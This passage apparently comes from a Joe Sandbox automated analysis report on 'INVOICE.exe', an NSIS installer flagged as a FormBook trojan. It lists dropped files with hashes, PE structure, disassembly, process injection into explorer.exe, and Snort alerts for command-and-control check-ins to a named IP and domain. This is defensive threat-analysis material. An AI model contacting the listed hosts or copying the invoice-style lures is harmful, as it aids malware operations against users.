                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.founder.com.cn/cn/cTheexplorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://fontfabrik.comexplorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.founder.com.cn/cnexplorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpfalse
                                      		high
                                      http://nsis.sf.net/NSIS_ErrorINVOICE.exefalse
                                        		high
                                        http://www.jiyu-kobo.co.jp/explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers8explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.fonts.comexplorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpfalse
                                            		high
                                            http://www.sandoll.co.krexplorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.urwpp.deDPleaseexplorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.zhongyicts.com.cnexplorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.sakkal.comexplorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown

                                            Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public

                                            IPDomainCountryFlagASNASN NameMalicious
                                            104.21.29.70
                                            		www.cpf3life.comUnited States
                                            		13335CLOUDFLARENETUStrue
                                            34.102.136.180
                                            		phonetomouth.comUnited States
                                            		15169GOOGLEUSfalse

                                            General Information

                                            Joe Sandbox Version:32.0.0 Black Diamond
                                            Analysis ID:433143
                                            Start date:11.06.2021
                                            Start time:11:36:19
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 8m 51s
                                            Hypervisor based Inspection enabled:false
                                            Report type:light
                                            Sample file name:INVOICE.exe
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:28
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:1
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@8/4@4/2
                                            EGA Information:Failed
                                            HDC Information:
                                            • Successful, ratio: 30.8% (good quality ratio 28.9%)
                                            • Quality average: 78.1%
                                            • Quality standard deviation: 28%
                                            HCA Information:
                                            • Successful, ratio: 89%
                                            • Number of executed functions: 0
                                            • Number of non-executed functions: 0
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            • Found application associated with file extension: .exe
                                            Warnings:
                                            Show All
                                            • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                                            • Excluded IPs from analysis (whitelisted): 104.43.139.144, 52.147.198.201, 104.43.193.48, 20.50.102.62, 184.30.24.56, 93.184.221.240, 20.54.104.15, 172.67.162.8, 104.21.42.126, 20.54.26.129, 20.54.7.98, 92.122.213.247, 92.122.213.194
                                            • Excluded domains from analysis (whitelisted): fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, www.dollysusmitha.com.cdn.cloudflare.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
                                            • Not all processes where analyzed, report is missing behavior information
                                            • VT rate limit hit for: /opt/package/joesandbox/database/analysis/433143/sample/INVOICE.exe

                                            Simulations

                                            Behavior and APIs

                                            No simulations

                                            Joe Sandbox View / Context

                                            IPs

                                            No context

                                            Domains

                                            No context

                                            ASN

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            CLOUDFLARENETUSRequest Quotation.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            8BDBD0yy0q.apkGet hashmaliciousBrowse
                                            • 172.67.169.41
                                            Shipment Invoice & Consignment Notification.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            8BDBD0yy0q.apkGet hashmaliciousBrowse
                                            • 172.67.169.41
                                            w4X8dxtGi6.exeGet hashmaliciousBrowse
                                            • 172.67.163.99
                                            St3aq2ELIJ.exeGet hashmaliciousBrowse
                                            • 104.21.2.30
                                            KY4cmAI0jU.exeGet hashmaliciousBrowse
                                            • 172.67.206.33
                                            w1iSiwLXiV.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            TKeRmCuiit.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            c71fd2gJus.exeGet hashmaliciousBrowse
                                            • 172.67.222.38
                                            BrBsL8sBvm.exeGet hashmaliciousBrowse
                                            • 172.67.188.69
                                            New Order PO2193570O1.docGet hashmaliciousBrowse
                                            • 162.159.134.233
                                            Proforma Invoice.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            00010200390_0192021.pdf.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            Payment Advice.pdf.docGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            Urgent Contract Order GH7856648,pdf.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            bL6FwQU4K5.exeGet hashmaliciousBrowse
                                            • 172.67.163.99
                                            E1a92ARmPw.exeGet hashmaliciousBrowse
                                            • 104.21.62.88
                                            crt9O3URua.exeGet hashmaliciousBrowse
                                            • 172.67.38.66
                                            fuoAl0V94I.exeGet hashmaliciousBrowse
                                            • 172.67.162.27

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            C:\Users\user\AppData\Local\Temp\nsj9221.tmp\System.dllShipment Invoice & Consignment Notification.exeGet hashmaliciousBrowse
                                              KY4cmAI0jU.exeGet hashmaliciousBrowse
                                                5t2CmTUhKc.exeGet hashmaliciousBrowse
                                                  8qdfmqz1PN.exeGet hashmaliciousBrowse
                                                    New Order PO2193570O1.docGet hashmaliciousBrowse
                                                      L2.xlsxGet hashmaliciousBrowse
                                                        Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsxGet hashmaliciousBrowse
                                                          New Order PO2193570O1.pdf.exeGet hashmaliciousBrowse
                                                            2320900000000.exeGet hashmaliciousBrowse
                                                              CshpH9OSkc.exeGet hashmaliciousBrowse
                                                                5SXTKXCnqS.exeGet hashmaliciousBrowse
                                                                  i6xFULh8J5.exeGet hashmaliciousBrowse
                                                                    AWB00028487364 -000487449287.docGet hashmaliciousBrowse
                                                                      090049000009000.exeGet hashmaliciousBrowse
                                                                        dYy3yfSkwY.exeGet hashmaliciousBrowse
                                                                          PAYMENT 02.BHN-DK.2021 (PO#4500111226).xlsxGet hashmaliciousBrowse
                                                                            Purchase Order Price List 061021.xlsxGet hashmaliciousBrowse
                                                                              Proforma Invoice and Bank swift-REG.PI-0086547654.exeGet hashmaliciousBrowse
                                                                                UGGJ4NnzFz.exeGet hashmaliciousBrowse
                                                                                  Proforma Invoice and Bank swift-REG.PI-0086547654.exeGet hashmaliciousBrowse

                                                                                    Created / dropped Files

                                                                                    C:\Users\user\AppData\Local\Temp\jxl61c12gqlj1w2
                                                                                    Process:C:\Users\user\Desktop\INVOICE.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):186368
                                                                                    Entropy (8bit):7.999073326465555
                                                                                    Encrypted:true
                                                                                    SSDEEP:3072:zeJR8AqtAiPJCcwSkW24wzwEV/SyhAJdPAanMl535y6iMSy2TZOcoREojDx9Syda:zeX8m2Ccwx9brJSymPbnMl535iyUOpL2
                                                                                    MD5:EABF5B1834E87B0207D0DC3130F37357
                                                                                    SHA1:C0B6A3BD8A5598EBAE0180E03DFA5208BAC7B8CC
                                                                                    SHA-256:58575C8E3AD256B66DC397F4721A0BD6E1BE2A80322B868591835394C53D0595
                                                                                    SHA-512:9D0F02D820ADED3AD52DDEBFBD8CAB10F3A9B45EAAECCDA5872B34439A328ED772B0F9B5878DF312D80326FBF6AB3ACC8E449AF3D9F76523918717EE14E4D402
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview: .!..!P.(.....F[.A03.W...?J.N.......F2.L..Pp.&..O%9....yg.a...:D........P.[k...w..g....iK".Q..r..Iw".3U.c.=;....[..w..G...L.(...v....F...5|..F.....A...P...u...B...o..z....1.S.Ll...9.$,Ns.$Fp............<I.I>.F#..K.3X.N_..d.#.._...O../...q.....qy..b..s..u/...*?...".[x..E6..E...T.s.*..x.E../A.{+...!..D.\...U.U.dV.....y8w6.._`G.Tp8.K.9.=.}.L...Gb.8.F.t....4..S.\.....~!*@..y.T..;.[..."`.kp..\........A0U1a4'.=........10..U..(.3...?..Pz....<s.F..pF.....N..Cl.........D/n..W#.(..x...IO.u..8...'e.?Pj.]U..}..C....O.9M...+.%?..rQ"X..33\S.:..).%.'....H.?.......,>.-......<.....w-..".Qt..Q.,...-B..?.j(.}.Wf)>.....'.....2...2e.n....U.t.L...+t...b..dZ..=i&.z4.%.v.#'.1.....R4.,@%.Q...............o !&4.5.F..D[......V....\......B,.77a...s.....:..i+}..."....l...uE..9.L..OI@..y/.....DW7..v."..Tr....nl`./...=.... .y6.(L.W.v...Z....].%.Y..0.'.r.8G......MG..8s{..p....Q}.tR@........x.._]D..'V.$I...^.......v.Q...X.?p...Me..m.0.N.h..G.P...G..#....x...X..C..^Icy.
                                                                                    C:\Users\user\AppData\Local\Temp\nfqccgctc
                                                                                    Process:C:\Users\user\Desktop\INVOICE.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):56625
                                                                                    Entropy (8bit):4.977281164917555
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:vpfNMGP6XAbV3hcW3/NFikDoq6/hWMlGXEWfBJwNAv:vPMGCwbFhhNFnorJWEGyNQ
                                                                                    MD5:BD19C858192D97E9604FACD096F21BAB
                                                                                    SHA1:20BE0E18245A58AFE0CF734670FE56E5FEE8650B
                                                                                    SHA-256:B62F6C39FAFAEEC5573AC373180FEDD001FD05D876035EFB56A6AD49DEACC280
                                                                                    SHA-512:49B5259F56056CC933D091AAC6024C0428AE70328F8A10150D80973F4BAE3862D5C9736EA45BD8E4D72979E7E756D77CA223BEEE11ABAA3056A90171B66F4218
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview: U...........L.....M.....N.....O.....P.....Q.....R.....S.../.T.....U.....V.....W.....X.....Y.....Z.../.[...F.\.../.].....^....._.....`.....a...8.b.....c.....d.....e.....f.....g...S.h.....i.....j.....k.....l.....m.....n.....o.....p.....q...+.r...8.s.....t...S.u.....v.....w.....x.....y.....z...+.{.....|.....}.....~...............+.......................+.................S.......................S..... .....'.................K...................................B...........\.....\.....\.......................8...........K.................................................................................................................K.......................K..... .....'.....................................................B...........\.....\.....\.......................8....................................................................................
                                                                                    C:\Users\user\AppData\Local\Temp\nsj9220.tmp
                                                                                    Process:C:\Users\user\Desktop\INVOICE.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):279242
                                                                                    Entropy (8bit):7.450736154071571
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:fYeX8m2Ccwx9brJSymPbnMl535iyUOpLmyD2S8dCwbFhjFnMI7ypt:AN9y5AhPe5pjUcd/8dCQhxMI2z
                                                                                    MD5:8FF52CDF1885512EB8681CC3FF94FA64
                                                                                    SHA1:12684292C1E37F8609B321E29F44E2E0C07B0B5E
                                                                                    SHA-256:588996F8F600844C43C8BB51A443B1E6046CB02DFA69CD19D62D63B8F51A5EAC
                                                                                    SHA-512:044614F6ADA0F03CC1DC021F6602DF069F4D7DB6F464AF513ECCA8C50DC224CD7205C1A91E5FDB85AE1CA09B78D94682B9BBDD3A651F0F3CCF8169348567F062
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview: ._......,.......................xH.......^......q_..........................................................................................................................................................................................................................................J...................j...............................................................................................................................b.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    C:\Users\user\AppData\Local\Temp\nsj9221.tmp\System.dll
                                                                                    Process:C:\Users\user\Desktop\INVOICE.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):11776
                                                                                    Entropy (8bit):5.855045165595541
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
                                                                                    MD5:FCCFF8CB7A1067E23FD2E2B63971A8E1
                                                                                    SHA1:30E2A9E137C1223A78A0F7B0BF96A1C361976D91
                                                                                    SHA-256:6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
                                                                                    SHA-512:F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: Shipment Invoice & Consignment Notification.exe, Detection: malicious, Browse
                                                                                    • Filename: KY4cmAI0jU.exe, Detection: malicious, Browse
                                                                                    • Filename: 5t2CmTUhKc.exe, Detection: malicious, Browse
                                                                                    • Filename: 8qdfmqz1PN.exe, Detection: malicious, Browse
                                                                                    • Filename: New Order PO2193570O1.doc, Detection: malicious, Browse
                                                                                    • Filename: L2.xlsx, Detection: malicious, Browse
                                                                                    • Filename: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx, Detection: malicious, Browse
                                                                                    • Filename: New Order PO2193570O1.pdf.exe, Detection: malicious, Browse
                                                                                    • Filename: 2320900000000.exe, Detection: malicious, Browse
                                                                                    • Filename: CshpH9OSkc.exe, Detection: malicious, Browse
                                                                                    • Filename: 5SXTKXCnqS.exe, Detection: malicious, Browse
                                                                                    • Filename: i6xFULh8J5.exe, Detection: malicious, Browse
                                                                                    • Filename: AWB00028487364 -000487449287.doc, Detection: malicious, Browse
                                                                                    • Filename: 090049000009000.exe, Detection: malicious, Browse
                                                                                    • Filename: dYy3yfSkwY.exe, Detection: malicious, Browse
                                                                                    • Filename: PAYMENT 02.BHN-DK.2021 (PO#4500111226).xlsx, Detection: malicious, Browse
                                                                                    • Filename: Purchase Order Price List 061021.xlsx, Detection: malicious, Browse
                                                                                    • Filename: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Detection: malicious, Browse
                                                                                    • Filename: UGGJ4NnzFz.exe, Detection: malicious, Browse
                                                                                    • Filename: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Detection: malicious, Browse
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                    Entropy (8bit):7.92520264057843
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                    • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:INVOICE.exe
                                                                                    File size:246224
                                                                                    MD5:98901aff995d92677cf637b241ae9a9b
                                                                                    SHA1:6dac1968c4a9ae4bf26f7fd38efb721fcf7d05dc
                                                                                    SHA256:fb6e849cd3af7e8b0c8143397e62a595a42abbfbbac81f2cdd0b2cb4d18ea543
                                                                                    SHA512:e969e941f176c67d1be598ac56882048fb2fc401e5a582b9f2314f09738d6b8768522ba5f67d8c80c260f1169ac103b8972084611a23ea9467c513f03ca9d883
                                                                                    SSDEEP:6144:Ds9q5ND7xrAX/6ccjpGYZ/T12D2TLV47VVgLP3CATNTLzcocuk:ySD9rAXCccjN/T1TRXbtcuk
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\.........

                                                                                    File Icon

                                                                                    Icon Hash:b2a88c96b2ca6a72

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0x40323c
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x4B1AE3C6 [Sat Dec 5 22:50:46 2009 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:099c0646ea7282d232219f8807883be0

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    sub esp, 00000180h
                                                                                    push ebx
                                                                                    push ebp
                                                                                    push esi
                                                                                    xor ebx, ebx
                                                                                    push edi
                                                                                    mov dword ptr [esp+18h], ebx
                                                                                    mov dword ptr [esp+10h], 00409130h
                                                                                    xor esi, esi
                                                                                    mov byte ptr [esp+14h], 00000020h
                                                                                    call dword ptr [00407030h]
                                                                                    push 00008001h
                                                                                    call dword ptr [004070B4h]
                                                                                    push ebx
                                                                                    call dword ptr [0040727Ch]
                                                                                    push 00000008h
                                                                                    mov dword ptr [00423F58h], eax
                                                                                    call 00007F9E98C9D50Eh
                                                                                    mov dword ptr [00423EA4h], eax
                                                                                    push ebx
                                                                                    lea eax, dword ptr [esp+34h]
                                                                                    push 00000160h
                                                                                    push eax
                                                                                    push ebx
                                                                                    push 0041F458h
                                                                                    call dword ptr [00407158h]
                                                                                    push 004091B8h
                                                                                    push 004236A0h
                                                                                    call 00007F9E98C9D1C1h
                                                                                    call dword ptr [004070B0h]
                                                                                    mov edi, 00429000h
                                                                                    push eax
                                                                                    push edi
                                                                                    call 00007F9E98C9D1AFh
                                                                                    push ebx
                                                                                    call dword ptr [0040710Ch]
                                                                                    cmp byte ptr [00429000h], 00000022h
                                                                                    mov dword ptr [00423EA0h], eax
                                                                                    mov eax, edi
                                                                                    jne 00007F9E98C9A90Ch
                                                                                    mov byte ptr [esp+14h], 00000022h
                                                                                    mov eax, 00429001h
                                                                                    push dword ptr [esp+14h]
                                                                                    push eax
                                                                                    call 00007F9E98C9CCA2h
                                                                                    push eax
                                                                                    call dword ptr [0040721Ch]
                                                                                    mov dword ptr [esp+1Ch], eax
                                                                                    jmp 00007F9E98C9A965h
                                                                                    cmp cl, 00000020h
                                                                                    jne 00007F9E98C9A908h
                                                                                    inc eax
                                                                                    cmp byte ptr [eax], 00000020h
                                                                                    je 00007F9E98C9A8FCh
                                                                                    cmp byte ptr [eax], 00000022h
                                                                                    mov byte ptr [eax+eax+00h], 00000000h

                                                                                    Rich Headers

                                                                                    Programming Language:
                                                                                    • [EXP] VC++ 6.0 SP5 build 8804

                                                                                    Data Directories

                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x9e0.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                    Sections

                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x10000x5a5a0x5c00False0.660453464674data6.41769823686IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                    .rdata0x70000x11900x1200False0.4453125data5.18162709925IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .data0x90000x1af980x400False0.55859375data4.70902740305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                    .ndata0x240000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .rsrc0x2c0000x9e00xa00False0.45625data4.51012867721IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                    Resources

                                                                                    NameRVASizeTypeLanguageCountry
                                                                                    RT_ICON0x2c1900x2e8dataEnglishUnited States
                                                                                    RT_DIALOG0x2c4780x100dataEnglishUnited States
                                                                                    RT_DIALOG0x2c5780x11cdataEnglishUnited States
                                                                                    RT_DIALOG0x2c6980x60dataEnglishUnited States
                                                                                    RT_GROUP_ICON0x2c6f80x14dataEnglishUnited States
                                                                                    RT_MANIFEST0x2c7100x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                    Imports

                                                                                    DLLImport
                                                                                    KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
                                                                                    USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                                    GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                                    SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                                    ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                                    COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                    ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                    VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                                    Possible Origin

                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                    EnglishUnited States

                                                                                    Network Behavior

                                                                                    Snort IDS Alerts

                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                    06/11/21-11:38:41.596097TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974780192.168.2.3104.21.29.70
                                                                                    06/11/21-11:38:41.596097TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974780192.168.2.3104.21.29.70
                                                                                    06/11/21-11:38:41.596097TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974780192.168.2.3104.21.29.70
                                                                                    06/11/21-11:39:01.004425TCP1201ATTACK-RESPONSES 403 Forbidden804975034.102.136.180192.168.2.3

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
